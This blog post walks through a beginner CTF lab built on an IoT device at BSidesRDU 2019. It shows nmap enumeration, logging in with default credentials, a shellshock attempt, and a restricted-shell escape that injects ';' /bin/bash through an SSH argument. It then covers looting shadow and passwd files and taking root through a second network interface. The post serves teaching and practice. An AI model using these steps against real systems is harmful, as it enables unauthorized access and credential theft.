2019 BSidesRDU - "Noobs Table" Experience and Challenge Write-Up

Welcome Thrillhouse Group attended BSidesRDU this year and instead of competing in the CTF, we contributed a stego challenge and also helped out at the "noobs table."  The idea of a noobs table has been kicked around for a little while now but this was the first time it was formally done at an EverSec CTF. Basically, there was a table in the CTF room reserved for people that are new to CTFs, and a couple of us were there to help with two sets of challenges created just for them. One was posted to the EverSec CTF challenges under the "newbs" category while teamWTG's contribution was a set of, effectively, offline challenges against an IoT device with extremely limited resources.

@uncue created the "newbs" challenges which included everything from service enumeration to lateral movement. Welcome Thrillhouse Group brought the "offline" set of challenges which included service enumeration, finding default credentials, password reuse attacks, a restricted shell escape, privilege escalation, and a few others flags hidden in files for pillaging.

The conference theme this year was "Security Dumpster Fire." With that in mind, Welcome Thrillhouse Group's set of challenges was, in-part, a recreation of an actual breach performed during a real dumpster fire of an external penetration test.

Milhouse Didn't Start the Fire.

Okay, let's get into it.

Service Enumeration

No flags were hidden in any banners. However, service enumeration is, generally speaking, the first step taken against a target in a netpen CTF. In the interest of time, and system stability, those who participated were told that SSH and HTTP were the only services they needed to investigate on this target.

# nmap -p 22,80 10.0.0.115

Nmap scan report for 10.0.0.115
Host is up (0.0084s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: <REDACTED>

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Default Credentials

Reviewing the web server was suggested as a good first step. Browsing to the target on port 80 would redirect you to HTTPS and present you with a nondescript login page. However, the title of the page indicated what the device was. A simple Google search of the device with the terms "default password" appended to the end would return admin:admin as the credentials. Most didn't have to Google it, however, failing to do so could have cost them points as there is a second account. Both the admin account and the secondary account names were accepted as flags. In addition to using popular search engines, the accounts could have also been found via the user management section of the admin's web interface, or in a few config files once they had access to the target's file system.

Once the admin user was logged in, the players were presented with the first 1337 speak flag:

First Flag!

Players were then asked leading questions about the device to get them to review the web server in depth. Things like, "what interesting settings do you see" and "are there any other accounts configured?" The only other juicy finding in the web interface was an ldap-user configured and that a password was clearly defined for the account. Players were then directed to find the clear text password for that account and a password reuse attack was encouraged against the SSH service to do that.

Password Reuse

Connecting to the device via SSH as admin would present you with a highly customized restricted shell:

# ssh admin@10.0.0.115
admin@10.0.0.115's password:
restricted>


Various device configuration tasks could be completed in this shell, however, you could not read the password for the ldap-user account, nor could you perform any of the escapes found here: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

Restricted Shell Escape

In the interest of time, players were encouraged to try shellshock:

# ssh admin@10.0.0.115 -t "() { :; }; /bin/bash"
admin@10.0.0.115's password: 
sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `/bin/restricted -p admin -c () { :; }; /bin/bash'
Connection to 10.0.0.115 closed.

We can see here that shellshock was having an effect given the "syntax error" messages. Now we can infer from these messages that the next step would be to terminate the command /bin/restricted -p admin -c and run another command.

Two ways to do that are with && or ;. Double ampersands requires the first command to run successfully before running the next command where as a semicolon simply separates commands.

So, now we can test this by replacing the shellshock attack with ; and running the id command:

# ssh admin@10.0.0.115 -t ';' id
admin@10.0.0.115's password: 
Unknown command: -c 
uid=1001(admin) gid=100(sshd)
Connection to 10.0.0.115 closed.

We can see in the output above, the id command ran successfully.
Now let's see if we can launch bash.

# ssh admin@10.0.0.115 -t ';' /bin/bash
admin@10.0.0.115's password: 
Unknown command: -c 
bash-3.2$ pwd
/var/home/admin
bash-3.2$ ls
adminflag.txt
bash-3.2$ cat adminflag.txt 
R3strictedSh3llz

Huzzah! At this point, pillaging was strongly encouraged. Though players were not root,  they would quickly find that being the admin user afforded them full access to almost everything on the box; including /etc/shadow. Nothing gets the heart pumping quite like a priv esc challenge though, so "rootflag.txt" was created so that only root could read it.  In order to find the path to root, chances are high that players would find some, if not all, of the "Pillage" flags.  So, let's quickly cover those next.

Pillage

When you are competing in a mixed/scenario style CTF, à la DerbyConCTF (RIP), it is wise to submit usernames, cracked passwords, and scour the box for flags in common locations such as .bash_history, /etc/passwd, config files, backup files, and databases. This important part of the process was exercised with the following planted flags:

ABri3fHistoryofFlags        # /var/home/admin/.bash_history
Alw4ysCh3cketcpasswd         # /data/etc_rw/passwd, not /etc/passwd
JuicyJuicyBackupFiles         # /data/etc_rw/shadow.bak
0hYeahD0mainUs3rCreds         # ldap username's creds, found in the product's database

Privilege Escalation

In order to perform the privilege escalation on the target the players needed to perform basic enumeration against the host. By the time we got to this point, players had already cracked root's password. Almost everybody tried to sudo or SSH in as root. However, the target does not have sudo installed and the root user is not allowed to SSH in!

This priv esc was dependent on checking which interfaces were configured on the device. This is a wise step to perform on any target you pwn because you never know which targets will serve you well as a pivot.

bash-3.2$ ifconfig
eth0      Link encap:Ethernet  HWaddr <redacted> 
          inet addr:10.0.0.115  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80:::fe0a:3ee0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:219331 errors:0 dropped:12400 overruns:0 frame:0
          TX packets:67730 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18418680 (17.5 MiB)  TX bytes:4337259 (4.1 MiB)
          Interrupt:40 Base address:0x8000 

int0      Link encap:Ethernet  HWaddr <redacted> 
          inet addr:10.254.128.1  Bcast:10.254.128.255  Mask:255.255.255.0
          inet6 addr: fe80:::2dff:fef0:aba5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:390 (390.0 b)
<snip>

Now that we have the IP address for a second interface, we can SSH to it as root and capture the last flag:

bash-3.2$ id
uid=1001(admin) gid=100(sshd)
bash-3.2$ cat /data/home/root/rootflag.txt 
cat: /data/home/root/rootflag.txt: Permission denied
bash-3.2$ ssh root@10.254.128.1            
root@10.254.128.1's password: 
# id
uid=0(root) gid=0(root)
# cat rootflag.txt 
sw33t9riv3scn00b

Conclusion

Though I started to lose my voice by midday, I believe that I personally helped about a dozen people nonetheless. My time at the noobs table was fulfilling and fun and I'd like to do it again sometime.

Thank you EverSec for allowing me to help out this year, thank you BSidesRDU for consistently running a great conference year after year, and thank you to all the n00bs who I got to work with this year. I hope to see you all as competitors at the next event!

Thanks for reading!
@strupo_

Find us on Twitter: @teamWTG

Popular posts from this blog

A Primer for On-Site CTFs

BHIS CTF@Shmoocon 2019 - Feeling Blue?

DEF CON 27 - Our Car Hacking CTF Experience